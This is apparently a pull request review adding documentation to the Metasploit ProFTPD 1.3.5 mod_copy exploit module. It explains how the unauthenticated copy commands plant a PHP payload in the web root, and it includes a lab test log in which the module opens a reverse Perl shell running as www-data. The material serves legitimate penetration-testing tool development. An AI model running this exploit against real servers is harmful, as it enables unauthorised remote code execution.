### PR TITLE
exploit/unix/ftp/proftpd_modcopy_exec: Add docs and resolve RuboCop violations

### PR DESCRIPTION
**Pull request by bcoles**
* Add documentation
* Add Notes
* Add reference URL
* Replace `fail_with` with `CheckCode` messages in `check` method
* Increase timeout for first socket read to 30 seconds. (#17569)
* Add additional checks in the `check` method - in particular to check when mod_copy is in use.
* Use `register_file_for_cleanup` to cleanup the payload dropped to disk. Prior to this change, the module left a permanent web shell backdoor on the system with no obvious warning to the operator. Now the backdoor will be cleaned up (or will remind the user to perform cleanup if cleanup fails).

### CODE REVIEW

File: documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md [hunk 1]
```diff
@@ -0,0 +1,94 @@
...
+Any unauthenticated client can leverage these commands to copy files from any
+part of the filesystem to a chosen destination. The copy commands are executed with
+the rights of the ProFTPD service, which by default runs under the privileges of the
+'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
+directory, PHP remote code execution is made possible.
+
+
+## Installation Steps
+
+Download and build:
```
Comment (jheysel-r7) [inline documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md:13]: I noticed these do not come installed by default in Ubuntu 22. Did you use the following when installing 1.3.5 / would it be worth adding these to the Installation Steps? 
```
sudo apt install make 
sudo apt-get install gcc
```

File: documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md [hunk 2]
```diff
@@ -0,0 +1,94 @@
...
+tar zxvf proftpd-1.3.5.tar.gz
+cd proftpd-1.3.5
+./configure --with-modules=mod_copy
+make
+```
+
+Run ProFTPD in foreground with `-n` flag for testing:
+
+```
+sudo ./proftpd -n
```
Comment (jheysel-r7) [inline documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md:26]: Hey @bcoles I'm getting the follow error when attempting to install on Ubuntu 22.04.01. Did you run into this/ do you have a solution we might be able to add to the Installation Steps?
```
msfuser@msfuser-virtual-machine:~/proftpd-1.3.5$ sudo ./proftpd
2023-03-22 20:27:36,725 msfuser-virtual-machine proftpd[14779]: fatal: unable to read configuration file '/usr/local/etc/proftpd.conf': No such file or directory
```

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the PR @bcoles. The changes look good to me, just a couple questions around target setup.

File: documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md (hunk 2 above)
Comment (bcoles) [reply documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md:26]: added

File: documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md (hunk 1 above)
Comment (bcoles) [reply documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md:13]: Added.

Depending on the distro there may be a bunch of other things which need to be installed (libc?), and using `apt install` won't work for systems which don't use Apt for package management or old systems which require using `apt-get install` instead.

The installation steps outline the basic steps to install, in particular any non-default and non-obvious steps users might encounter. Documenting the `--with-modules=mod_copy` configuration flag is extremely useful here, as is commentary surrounding creation of a world-writable directory within the web root.

During installation, the former would be identified by reading the vendor installation documentation. The latter would be identified by reading the module source code to understand the attack vector. Neither are intuitive.

**Comment by jheysel-r7** [comment]
Thanks for making those changes. Everything looks great. Testing was as expected:

```
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
                                         ng-metasploit.html
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html/test
SITEPATH => /var/www/html/test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
targeturi => /test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.130:80 - 172.16.199.130:21 - Connected to FTP server
[*] 172.16.199.130:80 - 172.16.199.130:21 - Sending copy commands to FTP server
[*] 172.16.199.130:80 - Executing PHP payload /test/Z1HRJ.php
[+] 172.16.199.130:80 - Deleted /var/www/html/test/Z1HRJ.php
[*] Command shell session 4 opened (172.16.199.1:4444 -> 172.16.199.130:38560) at 2023-03-24 18:10:32 -0400

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux msfuser-virtual-machine 5.19.0-35-generic #36~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 17 15:17:25 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
pwd
/var/www/html/test
```

**Comment by jheysel-r7** [comment]
# Release Notes
This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.

**Pull request merged**